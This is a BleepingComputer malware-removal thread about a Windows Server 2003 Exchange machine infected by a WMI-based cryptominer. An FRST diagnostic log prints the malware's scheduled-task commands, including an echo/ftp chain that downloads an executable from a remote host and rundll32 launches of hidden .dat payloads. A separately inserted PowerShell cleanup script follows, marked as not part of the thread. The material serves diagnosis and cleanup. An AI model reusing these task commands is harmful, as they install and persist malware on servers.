Update for Windows Server 2003 (KB973815) (HKLM\...\KB973815) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB973825) (HKLM\...\KB973825) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB973917) (HKLM\...\KB973917) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB973917-v2) (HKLM\...\KB973917-v2) (Version: 2 - Microsoft Corporation)
Update for Windows Server 2003 (KB977165) (HKLM\...\KB977165) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB978207) (HKLM\...\KB978207) (Version: 1 - Microsoft Corporation)
Update for Windows Server 2003 (KB980182) (HKLM\...\KB980182) (Version: 1 - Microsoft Corporation)
Update Rollup 5 for Exchange Server 2007 Service Pack 2 (KB2407132) (HKLM\...\KB2407132) (Version: 1 - Microsoft Corporation)
VDS 1.1 Update for R2 (HKLM\...\VDS11R2) (Version:  - Microsoft Corporation)
Windows Imaging Component (HKLM\...\WIC) (Version: 3.0.0.0 - Microsoft Corporation)
Windows Support Tools (HKLM-x32\...\{F07F0BCD-5C6D-4499-9F05-6ED747078A72}) (Version: 5.2.3790.3959 - Microsoft Corporation)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
ContextMenuHandlers1: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\Program Files\Microsoft Security Client\shellext.dll [2013-09-14] (Microsoft Corporation)
ContextMenuHandlers2: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\Program Files\Microsoft Security Client\shellext.dll [2013-09-14] (Microsoft Corporation)
ContextMenuHandlers4: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\Program Files\Microsoft Security Client\shellext.dll [2013-09-14] (Microsoft Corporation)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\WINDOWS\Tasks\defrag X.job => c:\WINDOWS\system32\defrag.exe
Task: C:\WINDOWS\Tasks\defrag.job => c:\WINDOWS\system32\defrag.exe
Task: C:\WINDOWS\Tasks\Microsoft Antimalware Scheduled Scan.job => C:\Program Files\Microsoft Security Client\MpCmdRun.exe
Task: C:\WINDOWS\Tasks\Mysa.job => cmdw c echo open down mysking info echo test echo 1433 echo binary echo get exe echo bye ftp execmdSYSTEM0 <==== ATTENTION
Task: C:\WINDOWS\Tasks\Mysa1.job => rundll32.exe  c:\windows\debug\item.dat,ServiceMain aaaarundll32.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Mysa2.job => c:\windows\debug\item.dat <==== ATTENTION
Task: C:\WINDOWS\Tasks\ok.job => rundll32.exe  c:\windows\debug\ok.dat,ServiceMain aaaarundll32.exe
Task: C:\WINDOWS\Tasks\rebootORshutdown.job => c:\WINDOWS\system32\shutdown.exe
Task: C:\WINDOWS\Tasks\systemstate.job => C:\WINDOWS\system32\ntbackup.exe backup C:\Documents and Settings\administrator.CENTRECITY\Local Settings\Application Data\Microsoft\Windows NT\NTBackup\data\systemstate.bks /n systemstate_MYSERVER-dr-00.bkf created 2/21/2008 at 5:31 PM /d Set created 2/21/2008 at 5:31 PM /v:no /r:no /rs:no /hc:off /m normal /j systemstate /l:s /f x:\backup\systemstate_MYSERVER-exch-01.bkf
 
==================== Shortcuts & WMI ========================
 
(The entries could be listed to be restored or removed.)
 
WMI_ActiveScriptEventConsumer_bleepyoumm2_consumer: <==== ATTENTION
 
==================== Loaded Modules (Whitelisted) ==============
 
2009-10-22 10:00 - 2009-10-22 10:00 - 000043432 _____ () C:\Program Files (x86)\Dell\SysMgt\oma\bin\omaep32.dll
2009-10-22 10:10 - 2009-10-22 10:10 - 000055208 _____ () C:\Program Files (x86)\Dell\SysMgt\iws\bin\win32\dsm_om_connsvc32.exe
2009-10-22 10:01 - 2009-10-22 10:01 - 000137128 _____ () C:\Program Files (x86)\Dell\SysMgt\oma\bin\invmib32.dll
2009-06-15 14:54 - 2009-06-15 14:54 - 000975872 _____ () C:\Program Files (x86)\Dell\SysMgt\oma\bin\libxml2.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\wd.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\UploadMgr => ""="Service"
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
HKLM\...\batfile\DefaultIcon: %SystemRoot%\System32\shell32.dll,-153 <==== ATTENTION
HKLM\...\cmdfile\DefaultIcon: %SystemRoot%\System32\shell32.dll,-153 <==== ATTENTION
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2007-12-10 09:48 - 2007-02-18 00:00 - 000000734 _____ C:\WINDOWS\system32\Drivers\etc\hosts
 
127.0.0.1       localhost
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1085031214-630328440-682003330-500\Control Panel\Desktop\\Wallpaper -> 
DNS Servers: 192.168.100.10
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: ) (ConsentPromptBehaviorUser: ) (EnableLUA: )
mpsdrv => Firewall Service is not running.
MpsSvc => Firewall Service is not running.
bfe => Firewall Service is not running.
Windows Firewall is disabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
DomainProfile\AuthorizedApplications: [C:\Program Files\Symantec\Backup Exec\RAWS\beremote.exe] => Enabled:Backup Exec Remote Agent for Windows Systems
DomainProfile\AuthorizedApplications: [C:\Program Files\Symantec\Backup Exec\RAWS\VxGather.exe] => Enabled:Backup Exec Diagnostic Gathering Utility
DomainProfile\AuthorizedApplications: [C:\Program Files (x86)\Mozilla Firefox\firefox.exe] => Enabled:Firefox (C:\Program Files (x86)\Mozilla Firefox)
StandardProfile\AuthorizedApplications: [C:\Program Files\Symantec\Backup Exec\RAWS\beremote.exe] => Enabled:Backup Exec Remote Agent for Windows Systems
StandardProfile\AuthorizedApplications: [C:\Program Files\Symantec\Backup Exec\RAWS\VxGather.exe] => Enabled:Backup Exec Diagnostic Gathering Utility
DomainProfile\GloballyOpenPorts: [3389:TCP] => :LocalSubNet:Enabled:@xpsp2res.dll,-22009
DomainProfile\GloballyOpenPorts: [139:TCP] => :LocalSubNet:Enabled:@xpsp2res.dll,-22004
DomainProfile\GloballyOpenPorts: [445:TCP] => :LocalSubNet:Enabled:@xpsp2res.dll,-22005
DomainProfile\GloballyOpenPorts: [137:UDP] => :LocalSubNet:Enabled:@xpsp2res.dll,-22001
DomainProfile\GloballyOpenPorts: [138:UDP] => :LocalSubNet:Enabled:@xpsp2res.dll,-22002
StandardProfile\GloballyOpenPorts: [3389:TCP] => :192.168.100.163/255.255.255.255:Enabled:@xpsp2res.dll,-22009
 
==================== Restore Points =========================
 
ATTENTION: System Restore is disabled
Check "winmgmt" service or repair WMI.
 
 
==================== Faulty Device Manager Devices =============
 
Name: Broadcom BCM5708C NetXtreme II GigE (NDIS VBD Client) #2
Description: Broadcom BCM5708C NetXtreme II GigE (NDIS VBD Client)
Class Guid: {4D36E972-E325-11CE-BFC1-08002BE10318}
Manufacturer: Broadcom Corporation
Service: l2nd
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: Intel® PRO/1000 PT Dual Port Server Adapter #2
Description: Intel® PRO/1000 PT Dual Port Server Adapter
Class Guid: {4D36E972-E325-11CE-BFC1-08002BE10318}
Manufacturer: Intel
Service: e1express
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: Broadcom BCM5708C NetXtreme II GigE (NDIS VBD Client)
Description: Broadcom BCM5708C NetXtreme II GigE (NDIS VBD Client)
Class Guid: {4D36E972-E325-11CE-BFC1-08002BE10318}
Manufacturer: Broadcom Corporation
Service: l2nd
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (09/11/2017 08:32:54 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application lsmose.exe, version 0.0.0.0, faulting module lsmose.exe, version 0.0.0.0, fault address 0x00000000000117de.
Processing media-specific event for [lsmose.exe!ws!]
 
Error: (09/11/2017 05:32:55 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application lsmose.exe, version 0.0.0.0, faulting module lsmose.exe, version 0.0.0.0, fault address 0x00000000000117de.
Processing media-specific event for [lsmose.exe!ws!]
 
Error: (09/11/2017 05:12:13 AM) (Source: MSExchangeSA) (EventID: 9360) (User: )
Description: OALGen encountered an error while generating the changes.oab file for version 2 and 3 differential downloads of address list '\Global Address List'.  The offline address list has not been updated so clients will not be able to download the current set of changes.  Check other logged events to find the cause of this error.
 
If the cause of the problem was intentional or cannot be resolved, OALGen can be forced to post a full offline address list by creating the DWORD registry key 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSExchangeSA\Parameters\OAL post full if diff fails' and setting it to 1 on this server.  When OALGen next generates the offline address list, clients will perform a full OAB download.  After that time, the registry key should be removed to prevent further full downloads.
 
- Default Offline Address List
 
Error: (09/10/2017 05:08:12 AM) (Source: MSExchangeSA) (EventID: 9360) (User: )
Description: OALGen encountered an error while generating the changes.oab file for version 2 and 3 differential downloads of address list '\Global Address List'.  The offline address list has not been updated so clients will not be able to download the current set of changes.  Check other logged events to find the cause of this error.
 
If the cause of the problem was intentional or cannot be resolved, OALGen can be forced to post a full offline address list by creating the DWORD registry key 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSExchangeSA\Parameters\OAL post full if diff fails' and setting it to 1 on this server.  When OALGen next generates the offline address list, clients will perform a full OAB download.  After that time, the registry key should be removed to prevent further full downloads.
 
- Default Offline Address List
 
Error: (09/09/2017 05:06:09 AM) (Source: MSExchangeSA) (EventID: 9360) (User: )
Description: OALGen encountered an error while generating the changes.oab file for version 2 and 3 differential downloads of address list '\Global Address List'.  The offline address list has not been updated so clients will not be able to download the current set of changes.  Check other logged events to find the cause of this error.
 
If the cause of the problem was intentional or cannot be resolved, OALGen can be forced to post a full offline address list by creating the DWORD registry key 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSExchangeSA\Parameters\OAL post full if diff fails' and setting it to 1 on this server.  When OALGen next generates the offline address list, clients will perform a full OAB download.  After that time, the registry key should be removed to prevent further full downloads.
 
- Default Offline Address List
 
Error: (09/08/2017 07:45:48 PM) (Source: Trend Micro ScanMail for Microsoft Exchange) (EventID: 12291) (User: )
Description: The transport scan module is unable to detect ScanMail or it does not have proper permission to access ScanMail related files or registries. ScanMail Master Service is not started. Please restart ScanMail Master Service.
 
Error: (09/08/2017 07:45:48 PM) (Source: Trend Micro ScanMail for Microsoft Exchange) (EventID: 12291) (User: )
Description: The transport scan module is unable to detect ScanMail or it does not have proper permission to access ScanMail related files or registries. ScanMail Master Service is not started. Please restart ScanMail Master Service.
 
Error: (09/08/2017 07:45:48 PM) (Source: Trend Micro ScanMail for Microsoft Exchange) (EventID: 12291) (User: )
Description: The transport scan module is unable to detect ScanMail or it does not have proper permission to access ScanMail related files or registries. ScanMail Master Service is not started. Please restart ScanMail Master Service.
 
Error: (09/08/2017 07:45:48 PM) (Source: Trend Micro ScanMail for Microsoft Exchange) (EventID: 12291) (User: )
Description: The transport scan module is unable to detect ScanMail or it does not have proper permission to access ScanMail related files or registries. ScanMail Master Service is not started. Please restart ScanMail Master Service.
 
Error: (09/08/2017 07:45:48 PM) (Source: Trend Micro ScanMail for Microsoft Exchange) (EventID: 12291) (User: )
Description: The transport scan module is unable to detect ScanMail or it does not have proper permission to access ScanMail related files or registries. ScanMail Master Service is not started. Please restart ScanMail Master Service.
 
 
System errors:
=============
Error: (09/11/2017 08:34:47 AM) (Source: TermService) (EventID: 1041) (User: )
Description: Autoreconnect failed to reconnect user to session because authentication failed. (0x0)
The system has failed to hibernate (The error code is %hs).  Hibernation will be disabled until the system is restarted.
 
Error: (09/11/2017 05:12:09 AM) (Source: Kerberos) (EventID: 4) (User: )
Description: The kerberos client received a KRB_AP_ERR_MODIFIED error from the
server MYSERVER-fs-00$.  The target name used was cifs/EXCHANGE.CentreCity.local. This
indicates that the password used to encrypt the kerberos service ticket
is different than that on the target server. Commonly, this is due to identically named 
machine accounts in the target realm (CENTRECITY.LOCAL), and the client realm.  
Please contact your system administrator.
 
Error: (09/10/2017 07:49:32 PM) (Source: Schannel) (EventID: 4106) (User: )
Description: An SSL connection request was received from a remote client application, but none
of the cipher suites supported by the client application are supported by the
server. The SSL connection request has failed.
 
Error: (09/10/2017 06:14:07 AM) (Source: Kerberos) (EventID: 4) (User: )
Description: The kerberos client received a KRB_AP_ERR_MODIFIED error from the
server MYSERVER-fs-00$.  The target name used was cifs/EXCHANGE.CentreCity.local. This
indicates that the password used to encrypt the kerberos service ticket
is different than that on the target server. Commonly, this is due to identically named 
machine accounts in the target realm (CENTRECITY.LOCAL), and the client realm.  
Please contact your system administrator.
 
Error: (09/10/2017 05:08:07 AM) (Source: Kerberos) (EventID: 4) (User: )
Description: The kerberos client received a KRB_AP_ERR_MODIFIED error from the
server MYSERVER-fs-00$.  The target name used was cifs/EXCHANGE.CentreCity.local. This
indicates that the password used to encrypt the kerberos service ticket
is different than that on the target server. Commonly, this is due to identically named 
machine accounts in the target realm (CENTRECITY.LOCAL), and the client realm.  
Please contact your system administrator.
 
Error: (09/09/2017 07:48:25 PM) (Source: Schannel) (EventID: 4106) (User: )
Description: An SSL connection request was received from a remote client application, but none
of the cipher suites supported by the client application are supported by the
server. The SSL connection request has failed.
 
Error: (09/09/2017 06:10:07 AM) (Source: Kerberos) (EventID: 4) (User: )
Description: The kerberos client received a KRB_AP_ERR_MODIFIED error from the
server MYSERVER-fs-00$.  The target name used was cifs/EXCHANGE.CentreCity.local. This
indicates that the password used to encrypt the kerberos service ticket
is different than that on the target server. Commonly, this is due to identically named 
machine accounts in the target realm (CENTRECITY.LOCAL), and the client realm.  
Please contact your system administrator.
 
Error: (09/09/2017 05:06:05 AM) (Source: Kerberos) (EventID: 4) (User: )
Description: The kerberos client received a KRB_AP_ERR_MODIFIED error from the
server MYSERVER-fs-00$.  The target name used was cifs/EXCHANGE.CentreCity.local. This
indicates that the password used to encrypt the kerberos service ticket
is different than that on the target server. Commonly, this is due to identically named 
machine accounts in the target realm (CENTRECITY.LOCAL), and the client realm.  
Please contact your system administrator.
 
Error: (09/08/2017 07:52:40 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.
 
New Signature Version: 
 
Previous Signature Version: 0.0.0.0
 
Update Source: Microsoft Malware Protection Center
 
Update Stage: Search
 
 
Signature Type: AntiSpyware
 
Update Type: Full
 
User: CENTRECITY\administrator
 
Current Engine Version: 
 
Previous Engine Version: 0.0.0.0
 
Error code: 0x80090326
 
Error description: The message received was unexpected or badly formatted.
 
Error: (09/08/2017 07:52:40 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.
 
New Signature Version: 
 
Previous Signature Version: 0.0.0.0
 
Update Source: Microsoft Malware Protection Center
 
Update Stage: Search
 
 
Signature Type: AntiVirus
 
Update Type: Full
 
User: CENTRECITY\administrator
 
Current Engine Version: 
 
Previous Engine Version: 0.0.0.0
 
Error code: 0x80090326
 
Error description: The message received was unexpected or badly formatted.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Xeon® CPU E5345 @ 2.33GHz
Percentage of memory in use: 92%
Total physical RAM: 16378.64 MB
Available physical RAM: 1294.25 MB
Total Virtual: 40335.16 MB
Available Virtual: 23056.78 MB
 
==================== Drives ================================
 
Drive c: (System) (Fixed) (Total:130.25 GB) (Free:97.02 GB) NTFS
Drive d: (Info Store) (Fixed) (Total:837.24 GB) (Free:451.25 GB) NTFS
Drive s: () (Network) (Total:1024.01 GB) (Free:171.78 GB) 
Drive x: (backup) (Fixed) (Total:5.83 GB) (Free:3.67 GB) NTFS
Drive z: (SWAP) (Fixed) (Total:136.12 GB) (Free:110.65 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows XP) (Size: 136.1 GB) (Disk ID: 00000080)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=130.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=5.8 GB) - (Type=07 NTFS)
 
========================================================
Disk: 1 (MBR Code: Windows XP) (Size: 837.3 GB) (Disk ID: CDF0D823)
Partition 1: (Not Active) - (Size=837.2 GB) - (Type=07 NTFS)
 
========================================================
Disk: 2 (MBR Code: Windows XP) (Size: 136.1 GB) (Disk ID: BFB7ABC1)
Partition 1: (Not Active) - (Size=136.1 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt ============================



 


#2 Aura (Bleepin' Special Ops, Malware Response Team, 19,681 posts)

Posted 11 September 2017 - 07:10 PM

Hi adalta :)

My name is Aura and I'll be assisting you with your malware issue. Since we'll be working together, you can call me Aura or Yoan, which is my real name, it's up to you! Now that we've broken the ice, I'll just ask you a few things during the time we'll be working together to clean your system and get it back to an operational state.
  • As you'll notice, the logs we are asking for here are quite lengthy, so it's normal for me to not reply exactly after you post them. This is because I need some time to analyse them and then act accordingly. However, I'll always reply within 24 hours, 48 hours at most if something unexpected happens
  • As long as I'm assisting you on BleepingComputer, in this thread, I'll ask you to not seek assistance anywhere else for any issue related to the system we are working on. If you have an issue, question, etc. about your computer, please ask it in this thread and I'll assist you
  • The same principle applies to any modifications you make to your system, I would like you to ask me before you do any manipulations that aren't in the instructions I posted. This is to ensure that we are operating in sync and I know exactly what's happening on your system
  • If you aren't sure about an instruction I'm giving you, ask me about it. This is to ensure that the clean-up process goes without any issue. I'll answer you and even give you more precise instructions/explanations if you need. There's no shame in asking questions here, better be safe than sorry!
  • If you don't reply to your thread within 3 days, I'll bump this thread to let you know that I'm waiting for you. If you don't reply after 5 days, it'll be closed. If you return after that period, you can send me a PM to get it unlocked and we'll continue where we left off
  • Since malware can work quickly, we want to get rid of them as fast as we can, before they make unknown changes to the system. This being said, I would appreciate if you could reply to this thread within 24 hours of me posting. This way, we'll have a good clean-up rhythm and the chances of complications will be reduced
  • I'm against any form of pirated, illegal and counterfeit software and material. So if you have any installed on your system, I'll ask you to uninstall them right now. You don't have to tell me if you indeed had some or not, I'll give you the benefit of the doubt. Plus, this would be against BleepingComputer's rules
  • In the end, you are the one asking for assistance here. So if you wish to go a different way during the clean-up, like format and reinstall Windows, you are free to do so. I would appreciate you to let me know about it first, and if you need, I can also assist you in the process
  • I would appreciate if you were to stay with me until the end, which means, until I declare your system clean. Just because your system isn't behaving weirdly anymore, or is running better than before, it doesn't mean that the infection is completely gone
    This being said, I have a full time job so sometimes it'll take longer for me to reply to you. Don't worry, you'll be my first priority as soon as I get home and have time to look at your thread
This being said, it's time to clean up some malware, so let's get started, shall we? :)

Sadly there's nothing we can do right now to help you remove the infection. The tools we use don't support Windows Server, and since these are heavily customised, there's no way for us to tell what's legitimate and what isn't. However, I can tell you that what you're infected with is the infection right here:

http://blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-miner-uses-wmi-eternalblue-spread-filelessly/

It contains all the information and technical details you need to remove the infection, such as the files, paths, tasks, WMI entry, etc. Traces in your logs include, but aren't limited to:
2017-09-08 18:35 - 2017-06-23 05:32 - 000000330 _____ C:\WINDOWS\Tasks\ok.job
2017-09-08 18:35 - 2017-06-08 17:32 - 000000414 _____ C:\WINDOWS\Tasks\Mysa2.job
2017-09-08 18:34 - 2017-06-08 17:31 - 000000410 _____ C:\WINDOWS\Tasks\Mysa.job
2017-09-08 18:34 - 2017-06-08 17:31 - 000000334 _____ C:\WINDOWS\Tasks\Mysa1.job
Task: C:\WINDOWS\Tasks\Mysa.job => cmdw c echo open down mysking info echo test echo 1433 echo binary echo get exe echo bye ftp execmdSYSTEM0 <==== ATTENTION
Task: C:\WINDOWS\Tasks\Mysa1.job => rundll32.exe  c:\windows\debug\item.dat,ServiceMain aaaarundll32.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Mysa2.job => c:\windows\debug\item.dat <==== ATTENTION
Task: C:\WINDOWS\Tasks\ok.job => rundll32.exe  c:\windows\debug\ok.dat,ServiceMain aaaarundll32.exe
WMI_ActiveScriptEventConsumer_bleepyoumm2_consumer: <==== ATTENTION
With that information, you should be able to manually clean the server. The key here is to get rid of the WMI entry. You can follow this guide for explanations (though you'll look for a different one, called bleepyoumm2).

https://www.bleepingcomputer.com/news/security/yeabests-cc-a-fileless-infection-using-wmi-to-hijack-your-browser/

If you need more information, let me know.

Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#3 adalta (Topic Starter, Members, 9 posts)

Posted 13 September 2017 - 12:21 PM

Thank you Aura.

 

I ran wbemtest and removed ActiveScriptEventConsumer.Name="f***youmm2_consumer"

I ran Shortcut Cleaner and nothing found

I ran Zemana AntiMalware (free) and found the following:

Internet Explorer Homepage - Suspicious Browser Setting
 
Internet Explorer URL - Suspicious Browser Setting
res://shdock.dll/softadmin.htm
 
ntdll.dll - Hollow Process
c:\WINDOWS\system32\ntdll.dll
 
 
> "The key here is to get rid of the WMI entry. You can follow this guide for explanations (though you'll look for a different one, called bleepyoumm2)."
I did not see a bleepyoumm2 entry in wbemtest. I did see a "f***youmm2_consumer" entry and I removed. 
 
I removed the tasks:
2017-09-08 18:35 - 2017-06-23 05:32 - 000000330 _____ C:\WINDOWS\Tasks\ok.job

2017-09-08 18:35 - 2017-06-08 17:32 - 000000414 _____ C:\WINDOWS\Tasks\Mysa2.job
2017-09-08 18:34 - 2017-06-08 17:31 - 000000410 _____ C:\WINDOWS\Tasks\Mysa.job
2017-09-08 18:34 - 2017-06-08 17:31 - 000000334 _____ C:\WINDOWS\Tasks\Mysa1.job

 

EDIT: added the info below.

 

Additionally, I found this folder with the lsmose.exe file. Do I remove this?

 

C:\WINDOWS\Debug>dir

 Volume in drive C is System
 Volume Serial Number is F0A4-5055
 
 Directory of C:\WINDOWS\Debug
 
09/11/2017  10:45 AM    <DIR>          .
09/11/2017  10:45 AM    <DIR>          ..
12/18/2007  09:28 PM           196,194 cysui.001.log
01/03/2008  12:06 PM           133,526 cysui.log
09/11/2017  05:32 AM         1,870,336 lsmose.exe
08/18/2016  01:56 PM            58,476 mrt.log
04/11/2012  03:47 AM            14,486 mrteng.log
09/12/2017  09:53 AM               858 msert.log
12/14/2007  09:16 PM                 0 Netlogon.log
12/14/2007  09:16 PM            10,588 NetSetup.LOG
09/13/2017  10:00 AM               182 PASSWD.LOG
12/10/2007  07:40 PM             4,808 SecOOBE.log
09/13/2017  10:21 AM    <DIR>          UserMode
12/10/2007  07:21 PM    <DIR>          WPD
              10 File(s)      2,289,454 bytes
               4 Dir(s)  107,226,417,152 bytes free
 
C:\WINDOWS\Debug>
 
 
The passwd.log file contains
09/13 10:00:11 Attempting password change server/domain \\CCDC-EXCH-01 for user ASPNET
09/13 10:00:11 SamChangePasswordUser2 on machine \\CCDC-EXCH-01 for user ASPNET returned 0x0
 
 
What do you suggest my next step be? Thank you again for your professional help.

Edited by adalta, 13 September 2017 - 12:26 PM.


#4 Aura (Bleepin' Special Ops, Malware Response Team, 19,681 posts)

Posted 13 September 2017 - 12:25 PM

The "bleepyoumm2" WMI entry was the "f**kyoumm2" one. It shows as bleep here because of the profanity filter.

Did you delete the .dat files inside the C:\Windows\debug folder? If you're not sure which ones to remove, you can list them here (using dir /a C:\Windows\debug from an elevated command prompt).



#5 adalta (Topic Starter, Members, 9 posts)

Posted 13 September 2017 - 01:19 PM

Funny.. 

 

I don't see .dat files in the C:\WINDOWS\Debug\ folder. I only see .log, .exe and folders which contain other .log and .bak files.

 

Thanks



#6 Aura (Bleepin' Special Ops, Malware Response Team, 19,681 posts)

Posted 13 September 2017 - 01:21 PM

Do you have hidden and system files view enabled in the Folder Options? You don't see these files?
C:\windows\debug\item.dat
C:\windows\debug\ok.dat

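A defender-side check for what posts #2, #4 and #6 describe (the WMI event consumer that had to be removed, the .job files under C:\WINDOWS\Tasks, and the hidden .dat files in C:\Windows\debug), as an added PowerShell example that is not from this thread, from FRST, or from the linked write-ups. It assumes PowerShell 2.0 on the Server 2003 box and an elevated session; the 'youmm2' name fragment and the folder paths come from the thread, and -Remove is an assumed switch of this script, off by default.

```powershell
# Added example (not from the thread). Enumerates permanent WMI event subscriptions,
# flags consumers whose name matches $NamePattern, optionally removes the matching
# consumer together with its binding and filter, then lists the on-disk artefacts
# that the FRST log pointed at. Assumes PowerShell 2.0 and an elevated prompt.
param(
    [string]$NamePattern = 'youmm2',   # fragment of the consumer name seen in the thread
    [switch]$Remove                     # assumed switch: delete matches instead of only listing
)

$ns = 'root\subscription'

# 1. A permanent subscription is Filter + Consumer joined by a Binding. Querying the
#    base class __EventConsumer returns every consumer type (ActiveScript, CommandLine...).
$filters   = @(Get-WmiObject -Namespace $ns -Class __EventFilter)
$consumers = @(Get-WmiObject -Namespace $ns -Class __EventConsumer)
$bindings  = @(Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding)

Write-Host "Event filters ($($filters.Count)):"
foreach ($f in $filters) {
    Write-Host ("  {0}`n    Query: {1}" -f $f.Name, $f.Query)
}

Write-Host "Event consumers ($($consumers.Count)):"
foreach ($c in $consumers) {
    $detail = ''
    if ($c.__CLASS -eq 'ActiveScriptEventConsumer') {
        # Report the script size only; the embedded script is never executed here.
        $detail = "ScriptingEngine=$($c.ScriptingEngine) ScriptText length=$($c.ScriptText.Length)"
    } elseif ($c.__CLASS -eq 'CommandLineEventConsumer') {
        $detail = "CommandLineTemplate=$($c.CommandLineTemplate)"
    }
    Write-Host ("  [{0}] {1} {2}" -f $c.__CLASS, $c.Name, $detail)
}

Write-Host "Bindings ($($bindings.Count)):"
foreach ($b in $bindings) {
    Write-Host ("  {0} -> {1}" -f $b.Filter, $b.Consumer)
}

# 2. Flag consumers matching the pattern. With -Remove, delete the binding, the filter
#    and the consumer together: removing only the consumer (as wbemtest does) leaves an
#    orphaned filter and binding behind, which still show up in later audits.
$suspect = $consumers | Where-Object { $_.Name -match $NamePattern }
foreach ($c in $suspect) {
    Write-Host "SUSPECT consumer: $($c.__CLASS).Name=`"$($c.Name)`""
    $relBindings = $bindings | Where-Object { $_.Consumer -match [regex]::Escape($c.Name) }
    foreach ($b in $relBindings) {
        # Binding.Filter is a reference like __EventFilter.Name="xyz"; extract the name.
        $fname = ($b.Filter -replace '^.*Name="([^"]+)".*$', '$1')
        Write-Host "  bound via filter: $fname"
        if ($Remove) {
            $b.Delete()
            $filters | Where-Object { $_.Name -eq $fname } | ForEach-Object { $_.Delete() }
        }
    }
    if ($Remove) { $c.Delete(); Write-Host "  removed consumer, binding and filter." }
}

# 3. On-disk artefacts named in the FRST log. -Force lists hidden and system files,
#    which is what "dir /a" shows and what a default Explorer view hides.
Write-Host "Scheduled task files in $env:SystemRoot\Tasks:"
Get-ChildItem -Path "$env:SystemRoot\Tasks" -Filter *.job -Force -ErrorAction SilentlyContinue |
    ForEach-Object { Write-Host ("  {0}  {1:yyyy-MM-dd HH:mm}  {2} bytes" -f $_.Name, $_.LastWriteTime, $_.Length) }

Write-Host "$env:SystemRoot\debug contents (including hidden/system):"
Get-ChildItem -Path "$env:SystemRoot\debug" -Force -ErrorAction SilentlyContinue |
    Where-Object { -not $_.PSIsContainer } |
    ForEach-Object {
        # .dat and .exe files in this log-only folder are the ones worth a second look
        $flag = ''
        if ($_.Extension -ieq '.dat' -or $_.Extension -ieq '.exe') { $flag = ' <== check' }
        Write-Host ("  {0,-20} {1,12:N0}  {2}{3}" -f $_.Name, $_.Length, $_.Attributes, $flag)
    }
```

Run it once without -Remove to review the listing, and keep a copy of the output before deleting anything so the filter query and consumer body are preserved for the incident record.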


#7 adalta (Topic Starter, Members, 9 posts)

Posted 13 September 2017 - 04:26 PM

Correct. Hidden\system files are showing and I do not see those files.

 

I did RDP into the machine a second time and received the lsmose.exe popup again: "lsmose.exe encountered a problem and needed to close" (I can't upload a screenshot).

 

https://drive.google.com/file/d/0B0gl0f4--8phLVcxSWxUZFM2S1E/view?usp=sharing

 

Thanks



#8 Aura (Bleepin' Special Ops, Malware Response Team, 19,681 posts)

Posted 13 September 2017 - 07:04 PM

This was 2 days ago though according to the screenshot. Also, can you empty the Temp folder (%LocalAppData%\Temp)?

Edited by Aura, 13 September 2017 - 07:04 PM.



#9 adalta (Topic Starter, Members, 9 posts)

Posted 14 September 2017 - 11:21 AM

Good catch. I'm hoping it was just another RDP session I logged into with the "old" infection.

 

I do not see an "AppData\Temp" folder.

